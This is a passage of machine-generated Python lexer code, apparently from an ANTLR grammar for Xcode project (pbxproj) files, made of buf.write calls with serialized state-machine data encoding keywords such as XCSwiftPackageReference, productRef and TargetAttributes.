buf.write("\7U\2\2\u0292\u0293\7y\2\2\u0293\u0294\7k\2\2\u0294\u0295")
buf.write("\7h\2\2\u0295\u0296\7v\2\2\u0296\u0297\7R\2\2\u0297\u0298")
buf.write("\7c\2\2\u0298\u0299\7e\2\2\u0299\u029a\7m\2\2\u029a\u029b")
buf.write("\7c\2\2\u029b\u029c\7i\2\2\u029c\u029d\7g\2\2\u029d\u029e")
buf.write("\7T\2\2\u029e\u029f\7g\2\2\u029f\u02a0\7h\2\2\u02a0\u02a1")
buf.write("\7g\2\2\u02a1\u02a2\7t\2\2\u02a2\u02a3\7g\2\2\u02a3\u02a4")
buf.write("\7p\2\2\u02a4\u02a5\7e\2\2\u02a5\u02a6\7g\2\2\u02a6\64")
buf.write("\3\2\2\2\u02a7\u02a8\7Z\2\2\u02a8\u02a9\7E\2\2\u02a9\u02aa")
buf.write("\7U\2\2\u02aa\u02ab\7y\2\2\u02ab\u02ac\7k\2\2\u02ac\u02ad")
buf.write("\7h\2\2\u02ad\u02ae\7v\2\2\u02ae\u02af\7R\2\2\u02af\u02b0")
buf.write("\7c\2\2\u02b0\u02b1\7e\2\2\u02b1\u02b2\7m\2\2\u02b2\u02b3")
buf.write("\7c\2\2\u02b3\u02b4\7i\2\2\u02b4\u02b5\7g\2\2\u02b5\u02b6")
buf.write("\7R\2\2\u02b6\u02b7\7t\2\2\u02b7\u02b8\7q\2\2\u02b8\u02b9")
buf.write("\7f\2\2\u02b9\u02ba\7w\2\2\u02ba\u02bb\7e\2\2\u02bb\u02bc")
buf.write("\7v\2\2\u02bc\u02bd\7F\2\2\u02bd\u02be\7g\2\2\u02be\u02bf")
buf.write("\7r\2\2\u02bf\u02c0\7g\2\2\u02c0\u02c1\7p\2\2\u02c1\u02c2")
buf.write("\7f\2\2\u02c2\u02c3\7g\2\2\u02c3\u02c4\7p\2\2\u02c4\u02c5")
buf.write("\7e\2\2\u02c5\u02c6\7{\2\2\u02c6\66\3\2\2\2\u02c7\u02c8")
buf.write("\7Z\2\2\u02c8\u02c9\7E\2\2\u02c9\u02ca\7X\2\2\u02ca\u02cb")
buf.write("\7g\2\2\u02cb\u02cc\7t\2\2\u02cc\u02cd\7u\2\2\u02cd\u02ce")
buf.write("\7k\2\2\u02ce\u02cf\7q\2\2\u02cf\u02d0\7p\2\2\u02d0\u02d1")
buf.write("\7I\2\2\u02d1\u02d2\7t\2\2\u02d2\u02d3\7q\2\2\u02d3\u02d4")
buf.write("\7w\2\2\u02d4\u02d5\7r\2\2\u02d58\3\2\2\2\u02d6\u02d7")
buf.write("\7h\2\2\u02d7\u02d8\7k\2\2\u02d8\u02d9\7n\2\2\u02d9\u02da")
buf.write("\7g\2\2\u02da\u02db\7T\2\2\u02db\u02dc\7g\2\2\u02dc\u02dd")
buf.write("\7h\2\2\u02dd:\3\2\2\2\u02de\u02df\7r\2\2\u02df\u02e0")
buf.write("\7t\2\2\u02e0\u02e1\7q\2\2\u02e1\u02e2\7f\2\2\u02e2\u02e3")
buf.write("\7w\2\2\u02e3\u02e4\7e\2\2\u02e4\u02e5\7v\2\2\u02e5\u02e6")
buf.write("\7T\2\2\u02e6\u02e7\7g\2\2\u02e7\u02e8\7h\2\2\u02e8<\3")
buf.write("\2\2\2\u02e9\u02ea\7e\2\2\u02ea\u02eb\7q\2\2\u02eb\u02ec")
buf.write("\7p\2\2\u02ec\u02ed\7v\2\2\u02ed\u02ee\7c\2\2\u02ee\u02ef")
buf.write("\7k\2\2\u02ef\u02f0\7p\2\2\u02f0\u02f1\7g\2\2\u02f1\u02f2")
buf.write("\7t\2\2\u02f2\u02f3\7R\2\2\u02f3\u02f4\7q\2\2\u02f4\u02f5")
buf.write("\7t\2\2\u02f5\u02f6\7v\2\2\u02f6\u02f7\7c\2\2\u02f7\u02f8")
buf.write("\7n\2\2\u02f8>\3\2\2\2\u02f9\u02fa\7r\2\2\u02fa\u02fb")
buf.write("\7t\2\2\u02fb\u02fc\7q\2\2\u02fc\u02fd\7z\2\2\u02fd\u02fe")
buf.write("\7{\2\2\u02fe\u02ff\7V\2\2\u02ff\u0300\7{\2\2\u0300\u0301")
buf.write("\7r\2\2\u0301\u0302\7g\2\2\u0302@\3\2\2\2\u0303\u0304")
buf.write("\7t\2\2\u0304\u0305\7g\2\2\u0305\u0306\7o\2\2\u0306\u0307")
buf.write("\7q\2\2\u0307\u0308\7v\2\2\u0308\u0309\7g\2\2\u0309\u030a")
buf.write("\7I\2\2\u030a\u030b\7n\2\2\u030b\u030c\7q\2\2\u030c\u030d")
buf.write("\7d\2\2\u030d\u030e\7c\2\2\u030e\u030f\7n\2\2\u030f\u0310")
buf.write("\7K\2\2\u0310\u0311\7F\2\2\u0311\u0312\7U\2\2\u0312\u0313")
buf.write("\7v\2\2\u0313\u0314\7t\2\2\u0314\u0315\7k\2\2\u0315\u0316")
buf.write("\7p\2\2\u0316\u0317\7i\2\2\u0317B\3\2\2\2\u0318\u0319")
buf.write("\7t\2\2\u0319\u031a\7g\2\2\u031a\u031b\7o\2\2\u031b\u031c")
buf.write("\7q\2\2\u031c\u031d\7v\2\2\u031d\u031e\7g\2\2\u031e\u031f")
buf.write("\7K\2\2\u031f\u0320\7p\2\2\u0320\u0321\7h\2\2\u0321\u0322")
buf.write("\7q\2\2\u0322D\3\2\2\2\u0323\u0324\7h\2\2\u0324\u0325")
buf.write("\7k\2\2\u0325\u0326\7n\2\2\u0326\u0327\7g\2\2\u0327\u0328")
buf.write("\7G\2\2\u0328\u0329\7p\2\2\u0329\u032a\7e\2\2\u032a\u032b")
buf.write("\7q\2\2\u032b\u032c\7f\2\2\u032c\u032d\7k\2\2\u032d\u032e")
buf.write("\7p\2\2\u032e\u032f\7i\2\2\u032fF\3\2\2\2\u0330\u0331")
buf.write("\7g\2\2\u0331\u0332\7z\2\2\u0332\u0333\7r\2\2\u0333\u0334")
buf.write("\7n\2\2\u0334\u0335\7k\2\2\u0335\u0336\7e\2\2\u0336\u0337")
buf.write("\7k\2\2\u0337\u0338\7v\2\2\u0338\u0339\7H\2\2\u0339\u033a")
buf.write("\7k\2\2\u033a\u033b\7n\2\2\u033b\u033c\7g\2\2\u033c\u033d")
buf.write("\7V\2\2\u033d\u033e\7{\2\2\u033e\u033f\7r\2\2\u033f\u0340")
buf.write("\7g\2\2\u0340H\3\2\2\2\u0341\u0342\7n\2\2\u0342\u0343")
buf.write("\7c\2\2\u0343\u0344\7u\2\2\u0344\u0345\7v\2\2\u0345\u0346")
buf.write("\7M\2\2\u0346\u0347\7p\2\2\u0347\u0348\7q\2\2\u0348\u0349")
buf.write("\7y\2\2\u0349\u034a\7p\2\2\u034a\u034b\7H\2\2\u034b\u034c")
buf.write("\7k\2\2\u034c\u034d\7n\2\2\u034d\u034e\7g\2\2\u034e\u034f")
buf.write("\7V\2\2\u034f\u0350\7{\2\2\u0350\u0351\7r\2\2\u0351\u0352")
buf.write("\7g\2\2\u0352J\3\2\2\2\u0353\u0354\7k\2\2\u0354\u0355")
buf.write("\7p\2\2\u0355\u0356\7e\2\2\u0356\u0357\7n\2\2\u0357\u0358")
buf.write("\7w\2\2\u0358\u0359\7f\2\2\u0359\u035a\7g\2\2\u035a\u035b")
buf.write("\7K\2\2\u035b\u035c\7p\2\2\u035c\u035d\7K\2\2\u035d\u035e")
buf.write("\7p\2\2\u035e\u035f\7f\2\2\u035f\u0360\7g\2\2\u0360\u0361")
buf.write("\7z\2\2\u0361L\3\2\2\2\u0362\u0363\7k\2\2\u0363\u0364")
buf.write("\7p\2\2\u0364\u0365\7f\2\2\u0365\u0366\7g\2\2\u0366\u0367")
buf.write("\7p\2\2\u0367\u0368\7v\2\2\u0368\u0369\7Y\2\2\u0369\u036a")
buf.write("\7k\2\2\u036a\u036b\7f\2\2\u036b\u036c\7v\2\2\u036c\u036d")
buf.write("\7j\2\2\u036dN\3\2\2\2\u036e\u036f\7v\2\2\u036f\u0370")
buf.write("\7c\2\2\u0370\u0371\7d\2\2\u0371\u0372\7Y\2\2\u0372\u0373")
buf.write("\7k\2\2\u0373\u0374\7f\2\2\u0374\u0375\7v\2\2\u0375\u0376")
buf.write("\7j\2\2\u0376P\3\2\2\2\u0377\u0378\7w\2\2\u0378\u0379")
buf.write("\7u\2\2\u0379\u037a\7g\2\2\u037a\u037b\7u\2\2\u037b\u037c")
buf.write("\7V\2\2\u037c\u037d\7c\2\2\u037d\u037e\7d\2\2\u037e\u037f")
buf.write("\7u\2\2\u037fR\3\2\2\2\u0380\u0381\7r\2\2\u0381\u0382")
buf.write("\7n\2\2\u0382\u0383\7c\2\2\u0383\u0384\7v\2\2\u0384\u0385")
buf.write("\7h\2\2\u0385\u0386\7q\2\2\u0386\u0387\7t\2\2\u0387\u0388")
buf.write("\7o\2\2\u0388\u0389\7H\2\2\u0389\u038a\7k\2\2\u038a\u038b")
buf.write("\7n\2\2\u038b\u038c\7v\2\2\u038c\u038d\7g\2\2\u038d\u038e")
buf.write("\7t\2\2\u038eT\3\2\2\2\u038f\u0390\7e\2\2\u0390\u0391")
buf.write("\7j\2\2\u0391\u0392\7k\2\2\u0392\u0393\7n\2\2\u0393\u0394")
buf.write("\7f\2\2\u0394\u0395\7t\2\2\u0395\u0396\7g\2\2\u0396\u0397")
buf.write("\7p\2\2\u0397V\3\2\2\2\u0398\u0399\7r\2\2\u0399\u039a")
buf.write("\7t\2\2\u039a\u039b\7q\2\2\u039b\u039c\7f\2\2\u039c\u039d")
buf.write("\7w\2\2\u039d\u039e\7e\2\2\u039e\u039f\7v\2\2\u039f\u03a0")
buf.write("\7K\2\2\u03a0\u03a1\7p\2\2\u03a1\u03a2\7u\2\2\u03a2\u03a3")
buf.write("\7v\2\2\u03a3\u03a4\7c\2\2\u03a4\u03a5\7n\2\2\u03a5\u03a6")
buf.write("\7n\2\2\u03a6\u03a7\7R\2\2\u03a7\u03a8\7c\2\2\u03a8\u03a9")
buf.write("\7v\2\2\u03a9\u03aa\7j\2\2\u03aaX\3\2\2\2\u03ab\u03ac")
buf.write("\7t\2\2\u03ac\u03ad\7g\2\2\u03ad\u03ae\7r\2\2\u03ae\u03af")
buf.write("\7q\2\2\u03af\u03b0\7u\2\2\u03b0\u03b1\7k\2\2\u03b1\u03b2")
buf.write("\7v\2\2\u03b2\u03b3\7q\2\2\u03b3\u03b4\7t\2\2\u03b4\u03b5")
buf.write("\7{\2\2\u03b5\u03b6\7W\2\2\u03b6\u03b7\7T\2\2\u03b7\u03b8")
buf.write("\7N\2\2\u03b8Z\3\2\2\2\u03b9\u03ba\7t\2\2\u03ba\u03bb")
buf.write("\7g\2\2\u03bb\u03bc\7s\2\2\u03bc\u03bd\7w\2\2\u03bd\u03be")
buf.write("\7k\2\2\u03be\u03bf\7t\2\2\u03bf\u03c0\7g\2\2\u03c0\u03c1")
buf.write("\7o\2\2\u03c1\u03c2\7g\2\2\u03c2\u03c3\7p\2\2\u03c3\u03c4")
buf.write("\7v\2\2\u03c4\\\3\2\2\2\u03c5\u03c6\7r\2\2\u03c6\u03c7")
buf.write("\7c\2\2\u03c7\u03c8\7e\2\2\u03c8\u03c9\7m\2\2\u03c9\u03ca")
buf.write("\7c\2\2\u03ca\u03cb\7i\2\2\u03cb\u03cc\7g\2\2\u03cc^\3")
buf.write("\2\2\2\u03cd\u03ce\7r\2\2\u03ce\u03cf\7c\2\2\u03cf\u03d0")
buf.write("\7e\2\2\u03d0\u03d1\7m\2\2\u03d1\u03d2\7c\2\2\u03d2\u03d3")
buf.write("\7i\2\2\u03d3\u03d4\7g\2\2\u03d4\u03d5\7R\2\2\u03d5\u03d6")
buf.write("\7t\2\2\u03d6\u03d7\7q\2\2\u03d7\u03d8\7f\2\2\u03d8\u03d9")
buf.write("\7w\2\2\u03d9\u03da\7e\2\2\u03da\u03db\7v\2\2\u03db\u03dc")
buf.write("\7F\2\2\u03dc\u03dd\7g\2\2\u03dd\u03de\7r\2\2\u03de\u03df")
buf.write("\7g\2\2\u03df\u03e0\7p\2\2\u03e0\u03e1\7f\2\2\u03e1\u03e2")
buf.write("\7g\2\2\u03e2\u03e3\7p\2\2\u03e3\u03e4\7e\2\2\u03e4\u03e5")
buf.write("\7k\2\2\u03e5\u03e6\7g\2\2\u03e6\u03e7\7u\2\2\u03e7`\3")
buf.write("\2\2\2\u03e8\u03e9\7p\2\2\u03e9\u03ea\7c\2\2\u03ea\u03eb")
buf.write("\7o\2\2\u03eb\u03ec\7g\2\2\u03ecb\3\2\2\2\u03ed\u03ee")
buf.write("\7r\2\2\u03ee\u03ef\7c\2\2\u03ef\u03f0\7v\2\2\u03f0\u03f1")
buf.write("\7j\2\2\u03f1d\3\2\2\2\u03f2\u03f3\7u\2\2\u03f3\u03f4")
buf.write("\7q\2\2\u03f4\u03f5\7w\2\2\u03f5\u03f6\7t\2\2\u03f6\u03f7")
buf.write("\7e\2\2\u03f7\u03f8\7g\2\2\u03f8\u03f9\7V\2\2\u03f9\u03fa")
buf.write("\7t\2\2\u03fa\u03fb\7g\2\2\u03fb\u03fc\7g\2\2\u03fcf\3")
buf.write("\2\2\2\u03fd\u03fe\7d\2\2\u03fe\u03ff\7w\2\2\u03ff\u0400")
buf.write("\7k\2\2\u0400\u0401\7n\2\2\u0401\u0402\7f\2\2\u0402\u0403")
buf.write("\7C\2\2\u0403\u0404\7e\2\2\u0404\u0405\7v\2\2\u0405\u0406")
buf.write("\7k\2\2\u0406\u0407\7q\2\2\u0407\u0408\7p\2\2\u0408\u0409")
buf.write("\7O\2\2\u0409\u040a\7c\2\2\u040a\u040b\7u\2\2\u040b\u040c")
buf.write("\7m\2\2\u040ch\3\2\2\2\u040d\u040e\7h\2\2\u040e\u040f")
buf.write("\7k\2\2\u040f\u0410\7n\2\2\u0410\u0411\7g\2\2\u0411\u0412")
buf.write("\7u\2\2\u0412j\3\2\2\2\u0413\u0414\7t\2\2\u0414\u0415")
buf.write("\7w\2\2\u0415\u0416\7p\2\2\u0416\u0417\7Q\2\2\u0417\u0418")
buf.write("\7p\2\2\u0418\u0419\7n\2\2\u0419\u041a\7{\2\2\u041a\u041b")
buf.write("\7H\2\2\u041b\u041c\7q\2\2\u041c\u041d\7t\2\2\u041d\u041e")
buf.write("\7F\2\2\u041e\u041f\7g\2\2\u041f\u0420\7r\2\2\u0420\u0421")
buf.write("\7n\2\2\u0421\u0422\7q\2\2\u0422\u0423\7{\2\2\u0423\u0424")
buf.write("\7o\2\2\u0424\u0425\7g\2\2\u0425\u0426\7p\2\2\u0426\u0427")
buf.write("\7v\2\2\u0427\u0428\7R\2\2\u0428\u0429\7q\2\2\u0429\u042a")
buf.write("\7u\2\2\u042a\u042b\7v\2\2\u042b\u042c\7r\2\2\u042c\u042d")
buf.write("\7t\2\2\u042d\u042e\7q\2\2\u042e\u042f\7e\2\2\u042f\u0430")
buf.write("\7g\2\2\u0430\u0431\7u\2\2\u0431\u0432\7u\2\2\u0432\u0433")
buf.write("\7k\2\2\u0433\u0434\7p\2\2\u0434\u0435\7i\2\2\u0435l\3")
buf.write("\2\2\2\u0436\u0437\7*\2\2\u0437n\3\2\2\2\u0438\u0439\7")
buf.write(".\2\2\u0439p\3\2\2\2\u043a\u043b\7+\2\2\u043br\3\2\2\2")
buf.write("\u043c\u043d\7d\2\2\u043d\u043e\7w\2\2\u043e\u043f\7k")
buf.write("\2\2\u043f\u0440\7n\2\2\u0440\u0441\7f\2\2\u0441\u0442")
buf.write("\7E\2\2\u0442\u0443\7q\2\2\u0443\u0444\7p\2\2\u0444\u0445")
buf.write("\7h\2\2\u0445\u0446\7k\2\2\u0446\u0447\7i\2\2\u0447\u0448")
buf.write("\7w\2\2\u0448\u0449\7t\2\2\u0449\u044a\7c\2\2\u044a\u044b")
buf.write("\7v\2\2\u044b\u044c\7k\2\2\u044c\u044d\7q\2\2\u044d\u044e")
buf.write("\7p\2\2\u044e\u044f\7N\2\2\u044f\u0450\7k\2\2\u0450\u0451")
buf.write("\7u\2\2\u0451\u0452\7v\2\2\u0452t\3\2\2\2\u0453\u0454")
buf.write("\7d\2\2\u0454\u0455\7w\2\2\u0455\u0456\7k\2\2\u0456\u0457")
buf.write("\7n\2\2\u0457\u0458\7f\2\2\u0458\u0459\7R\2\2\u0459\u045a")
buf.write("\7j\2\2\u045a\u045b\7c\2\2\u045b\u045c\7u\2\2\u045c\u045d")
buf.write("\7g\2\2\u045d\u045e\7u\2\2\u045ev\3\2\2\2\u045f\u0460")
buf.write("\7d\2\2\u0460\u0461\7w\2\2\u0461\u0462\7k\2\2\u0462\u0463")
buf.write("\7n\2\2\u0463\u0464\7f\2\2\u0464\u0465\7T\2\2\u0465\u0466")
buf.write("\7w\2\2\u0466\u0467\7n\2\2\u0467\u0468\7g\2\2\u0468\u0469")
buf.write("\7u\2\2\u0469x\3\2\2\2\u046a\u046b\7f\2\2\u046b\u046c")
buf.write("\7g\2\2\u046c\u046d\7r\2\2\u046d\u046e\7g\2\2\u046e\u046f")
buf.write("\7p\2\2\u046f\u0470\7f\2\2\u0470\u0471\7g\2\2\u0471\u0472")
buf.write("\7p\2\2\u0472\u0473\7e\2\2\u0473\u0474\7k\2\2\u0474\u0475")
buf.write("\7g\2\2\u0475\u0476\7u\2\2\u0476z\3\2\2\2\u0477\u0478")
buf.write("\7r\2\2\u0478\u0479\7t\2\2\u0479\u047a\7q\2\2\u047a\u047b")
buf.write("\7f\2\2\u047b\u047c\7w\2\2\u047c\u047d\7e\2\2\u047d\u047e")
buf.write("\7v\2\2\u047e\u047f\7P\2\2\u047f\u0480\7c\2\2\u0480\u0481")
buf.write("\7o\2\2\u0481\u0482\7g\2\2\u0482|\3\2\2\2\u0483\u0484")
buf.write("\7r\2\2\u0484\u0485\7t\2\2\u0485\u0486\7q\2\2\u0486\u0487")
buf.write("\7f\2\2\u0487\u0488\7w\2\2\u0488\u0489\7e\2\2\u0489\u048a")
buf.write("\7v\2\2\u048a\u048b\7T\2\2\u048b\u048c\7g\2\2\u048c\u048d")
buf.write("\7h\2\2\u048d\u048e\7g\2\2\u048e\u048f\7t\2\2\u048f\u0490")
buf.write("\7g\2\2\u0490\u0491\7p\2\2\u0491\u0492\7e\2\2\u0492\u0493")
buf.write("\7g\2\2\u0493~\3\2\2\2\u0494\u0495\7r\2\2\u0495\u0496")
buf.write("\7t\2\2\u0496\u0497\7q\2\2\u0497\u0498\7f\2\2\u0498\u0499")
buf.write("\7w\2\2\u0499\u049a\7e\2\2\u049a\u049b\7v\2\2\u049b\u049c")
buf.write("\7V\2\2\u049c\u049d\7{\2\2\u049d\u049e\7r\2\2\u049e\u049f")
buf.write("\7g\2\2\u049f\u0080\3\2\2\2\u04a0\u04a1\7n\2\2\u04a1\u04a2")
buf.write("\7k\2\2\u04a2\u04a3\7p\2\2\u04a3\u04a4\7g\2\2\u04a4\u04a5")
buf.write("\7G\2\2\u04a5\u04a6\7p\2\2\u04a6\u04a7\7f\2\2\u04a7\u04a8")
buf.write("\7k\2\2\u04a8\u04a9\7p\2\2\u04a9\u04aa\7i\2\2\u04aa\u0082")
buf.write("\3\2\2\2\u04ab\u04ac\7z\2\2\u04ac\u04ad\7e\2\2\u04ad\u04ae")
buf.write("\7N\2\2\u04ae\u04af\7c\2\2\u04af\u04b0\7p\2\2\u04b0\u04b1")
buf.write("\7i\2\2\u04b1\u04b2\7w\2\2\u04b2\u04b3\7c\2\2\u04b3\u04b4")
buf.write("\7i\2\2\u04b4\u04b5\7g\2\2\u04b5\u04b6\7U\2\2\u04b6\u04b7")
buf.write("\7r\2\2\u04b7\u04b8\7g\2\2\u04b8\u04b9\7e\2\2\u04b9\u04ba")
buf.write("\7k\2\2\u04ba\u04bb\7h\2\2\u04bb\u04bc\7k\2\2\u04bc\u04bd")
buf.write("\7e\2\2\u04bd\u04be\7c\2\2\u04be\u04bf\7v\2\2\u04bf\u04c0")
buf.write("\7k\2\2\u04c0\u04c1\7q\2\2\u04c1\u04c2\7p\2\2\u04c2\u04c3")
buf.write("\7K\2\2\u04c3\u04c4\7f\2\2\u04c4\u04c5\7g\2\2\u04c5\u04c6")
buf.write("\7p\2\2\u04c6\u04c7\7v\2\2\u04c7\u04c8\7k\2\2\u04c8\u04c9")
buf.write("\7h\2\2\u04c9\u04ca\7k\2\2\u04ca\u04cb\7g\2\2\u04cb\u04cc")
buf.write("\7t\2\2\u04cc\u0084\3\2\2\2\u04cd\u04ce\7r\2\2\u04ce\u04cf")
buf.write("\7n\2\2\u04cf\u04d0\7k\2\2\u04d0\u04d1\7u\2\2\u04d1\u04d2")
buf.write("\7v\2\2\u04d2\u04d3\7U\2\2\u04d3\u04d4\7v\2\2\u04d4\u04d5")
buf.write("\7t\2\2\u04d5\u04d6\7w\2\2\u04d6\u04d7\7e\2\2\u04d7\u04d8")
buf.write("\7v\2\2\u04d8\u04d9\7w\2\2\u04d9\u04da\7t\2\2\u04da\u04db")
buf.write("\7g\2\2\u04db\u04dc\7F\2\2\u04dc\u04dd\7g\2\2\u04dd\u04de")
buf.write("\7h\2\2\u04de\u04df\7k\2\2\u04df\u04e0\7p\2\2\u04e0\u04e1")
buf.write("\7k\2\2\u04e1\u04e2\7v\2\2\u04e2\u04e3\7k\2\2\u04e3\u04e4")
buf.write("\7q\2\2\u04e4\u04e5\7p\2\2\u04e5\u04e6\7K\2\2\u04e6\u04e7")
buf.write("\7f\2\2\u04e7\u04e8\7g\2\2\u04e8\u04e9\7p\2\2\u04e9\u04ea")
buf.write("\7v\2\2\u04ea\u04eb\7k\2\2\u04eb\u04ec\7h\2\2\u04ec\u04ed")
buf.write("\7k\2\2\u04ed\u04ee\7g\2\2\u04ee\u04ef\7t\2\2\u04ef\u0086")
buf.write("\3\2\2\2\u04f0\u04f1\7c\2\2\u04f1\u04f2\7v\2\2\u04f2\u04f3")
buf.write("\7v\2\2\u04f3\u04f4\7t\2\2\u04f4\u04f5\7k\2\2\u04f5\u04f6")
buf.write("\7d\2\2\u04f6\u04f7\7w\2\2\u04f7\u04f8\7v\2\2\u04f8\u04f9")
buf.write("\7g\2\2\u04f9\u04fa\7u\2\2\u04fa\u0088\3\2\2\2\u04fb\u04fc")
buf.write("\7N\2\2\u04fc\u04fd\7c\2\2\u04fd\u04fe\7u\2\2\u04fe\u04ff")
buf.write("\7v\2\2\u04ff\u0500\7U\2\2\u0500\u0501\7y\2\2\u0501\u0502")
buf.write("\7k\2\2\u0502\u0503\7h\2\2\u0503\u0504\7v\2\2\u0504\u0505")
buf.write("\7O\2\2\u0505\u0506\7k\2\2\u0506\u0507\7i\2\2\u0507\u0508")
buf.write("\7t\2\2\u0508\u0509\7c\2\2\u0509\u050a\7v\2\2\u050a\u050b")
buf.write("\7k\2\2\u050b\u050c\7q\2\2\u050c\u050d\7p\2\2\u050d\u008a")
buf.write("\3\2\2\2\u050e\u050f\7F\2\2\u050f\u0510\7g\2\2\u0510\u0511")
buf.write("\7h\2\2\u0511\u0512\7c\2\2\u0512\u0513\7w\2\2\u0513\u0514")
buf.write("\7n\2\2\u0514\u0515\7v\2\2\u0515\u0516\7D\2\2\u0516\u0517")
buf.write("\7w\2\2\u0517\u0518\7k\2\2\u0518\u0519\7n\2\2\u0519\u051a")
buf.write("\7f\2\2\u051a\u051b\7U\2\2\u051b\u051c\7{\2\2\u051c\u051d")
buf.write("\7u\2\2\u051d\u051e\7v\2\2\u051e\u051f\7g\2\2\u051f\u0520")
buf.write("\7o\2\2\u0520\u0521\7V\2\2\u0521\u0522\7{\2\2\u0522\u0523")
buf.write("\7r\2\2\u0523\u0524\7g\2\2\u0524\u0525\7H\2\2\u0525\u0526")
buf.write("\7q\2\2\u0526\u0527\7t\2\2\u0527\u0528\7Y\2\2\u0528\u0529")
buf.write("\7q\2\2\u0529\u052a\7t\2\2\u052a\u052b\7m\2\2\u052b\u052c")
buf.write("\7u\2\2\u052c\u052d\7r\2\2\u052d\u052e\7c\2\2\u052e\u052f")
buf.write("\7e\2\2\u052f\u0530\7g\2\2\u0530\u008c\3\2\2\2\u0531\u0532")
buf.write("\7N\2\2\u0532\u0533\7c\2\2\u0533\u0534\7u\2\2\u0534\u0535")
buf.write("\7v\2\2\u0535\u0536\7U\2\2\u0536\u0537\7y\2\2\u0537\u0538")
buf.write("\7k\2\2\u0538\u0539\7h\2\2\u0539\u053a\7v\2\2\u053a\u053b")
buf.write("\7W\2\2\u053b\u053c\7r\2\2\u053c\u053d\7f\2\2\u053d\u053e")
buf.write("\7c\2\2\u053e\u053f\7v\2\2\u053f\u0540\7g\2\2\u0540\u0541")
buf.write("\7E\2\2\u0541\u0542\7j\2\2\u0542\u0543\7g\2\2\u0543\u0544")
buf.write("\7e\2\2\u0544\u0545\7m\2\2\u0545\u008e\3\2\2\2\u0546\u0547")
buf.write("\7D\2\2\u0547\u0548\7w\2\2\u0548\u0549\7k\2\2\u0549\u054a")
buf.write("\7n\2\2\u054a\u054b\7f\2\2\u054b\u054c\7K\2\2\u054c\u054d")
buf.write("\7p\2\2\u054d\u054e\7f\2\2\u054e\u054f\7g\2\2\u054f\u0550")
buf.write("\7r\2\2\u0550\u0551\7g\2\2\u0551\u0552\7p\2\2\u0552\u0553")
buf.write("\7f\2\2\u0553\u0554\7g\2\2\u0554\u0555\7p\2\2\u0555\u0556")
buf.write("\7v\2\2\u0556\u0557\7V\2\2\u0557\u0558\7c\2\2\u0558\u0559")
buf.write("\7t\2\2\u0559\u055a\7i\2\2\u055a\u055b\7g\2\2\u055b\u055c")
buf.write("\7v\2\2\u055c\u055d\7u\2\2\u055d\u055e\7K\2\2\u055e\u055f")
buf.write("\7p\2\2\u055f\u0560\7R\2\2\u0560\u0561\7c\2\2\u0561\u0562")
buf.write("\7t\2\2\u0562\u0563\7c\2\2\u0563\u0564\7n\2\2\u0564\u0565")
buf.write("\7n\2\2\u0565\u0566\7g\2\2\u0566\u0567\7n\2\2\u0567\u0090")
buf.write("\3\2\2\2\u0568\u0569\7N\2\2\u0569\u056a\7c\2\2\u056a\u056b")
buf.write("\7u\2\2\u056b\u056c\7v\2\2\u056c\u056d\7V\2\2\u056d\u056e")
buf.write("\7g\2\2\u056e\u056f\7u\2\2\u056f\u0570\7v\2\2\u0570\u0571")
buf.write("\7k\2\2\u0571\u0572\7p\2\2\u0572\u0573\7i\2\2\u0573\u0574")
buf.write("\7W\2\2\u0574\u0575\7r\2\2\u0575\u0576\7i\2\2\u0576\u0577")
buf.write("\7t\2\2\u0577\u0578\7c\2\2\u0578\u0579\7f\2\2\u0579\u057a")
buf.write("\7g\2\2\u057a\u057b\7E\2\2\u057b\u057c\7j\2\2\u057c\u057d")
buf.write("\7g\2\2\u057d\u057e\7e\2\2\u057e\u057f\7m\2\2\u057f\u0092")
buf.write("\3\2\2\2\u0580\u0581\7N\2\2\u0581\u0582\7c\2\2\u0582\u0583")
buf.write("\7u\2\2\u0583\u0584\7v\2\2\u0584\u0585\7W\2\2\u0585\u0586")
buf.write("\7r\2\2\u0586\u0587\7i\2\2\u0587\u0588\7t\2\2\u0588\u0589")
buf.write("\7c\2\2\u0589\u058a\7f\2\2\u058a\u058b\7g\2\2\u058b\u058c")
buf.write("\7E\2\2\u058c\u058d\7j\2\2\u058d\u058e\7g\2\2\u058e\u058f")
buf.write("\7e\2\2\u058f\u0590\7m\2\2\u0590\u0094\3\2\2\2\u0591\u0592")
buf.write("\7Q\2\2\u0592\u0593\7T\2\2\u0593\u0594\7I\2\2\u0594\u0595")
buf.write("\7C\2\2\u0595\u0596\7P\2\2\u0596\u0597\7K\2\2\u0597\u0598")
buf.write("\7\\\2\2\u0598\u0599\7C\2\2\u0599\u059a\7V\2\2\u059a\u059b")
buf.write("\7K\2\2\u059b\u059c\7Q\2\2\u059c\u059d\7P\2\2\u059d\u059e")
buf.write("\7P\2\2\u059e\u059f\7C\2\2\u059f\u05a0\7O\2\2\u05a0\u05a1")
buf.write("\7G\2\2\u05a1\u0096\3\2\2\2\u05a2\u05a3\7V\2\2\u05a3\u05a4")
buf.write("\7c\2\2\u05a4\u05a5\7t\2\2\u05a5\u05a6\7i\2\2\u05a6\u05a7")
buf.write("\7g\2\2\u05a7\u05a8\7v\2\2\u05a8\u05a9\7C\2\2\u05a9\u05aa")
buf.write("\7v\2\2\u05aa\u05ab\7v\2\2\u05ab\u05ac\7t\2\2\u05ac\u05ad")
buf.write("\7k\2\2\u05ad\u05ae\7d\2\2\u05ae\u05af\7w\2\2\u05af\u05b0")
buf.write("\7v\2\2\u05b0\u05b1\7g\2\2\u05b1\u05b2\7u\2\2\u05b2\u0098")
buf.write("\3\2\2\2\u05b3\u05b4\7E\2\2\u05b4\u05b5\7t\2\2\u05b5\u05b6")
buf.write("\7g\2\2\u05b6\u05b7\7c\2\2\u05b7\u05b8\7v\2\2\u05b8\u05b9")
buf.write("\7g\2\2\u05b9\u05ba\7f\2\2\u05ba\u05bb\7Q\2\2\u05bb\u05bc")
buf.write("\7p\2\2\u05bc\u05bd\7V\2\2\u05bd\u05be\7q\2\2\u05be\u05bf")
buf.write("\7q\2\2\u05bf\u05c0\7n\2\2\u05c0\u05c1\7u\2\2\u05c1\u05c2")
buf.write("\7X\2\2\u05c2\u05c3\7g\2\2\u05c3\u05c4\7t\2\2\u05c4\u05c5")
buf.write("\7u\2\2\u05c5\u05c6\7k\2\2\u05c6\u05c7\7q\2\2\u05c7\u05c8")
buf.write("\7p\2\2\u05c8\u009a\3\2\2\2\u05c9\u05ca\7V\2\2\u05ca\u05cb")
buf.write("\7g\2\2\u05cb\u05cc\7u\2\2\u05cc\u05cd\7v\2\2\u05cd\u05ce")
buf.write("\7V\2\2\u05ce\u05cf\7c\2\2\u05cf\u05d0\7t\2\2\u05d0\u05d1")
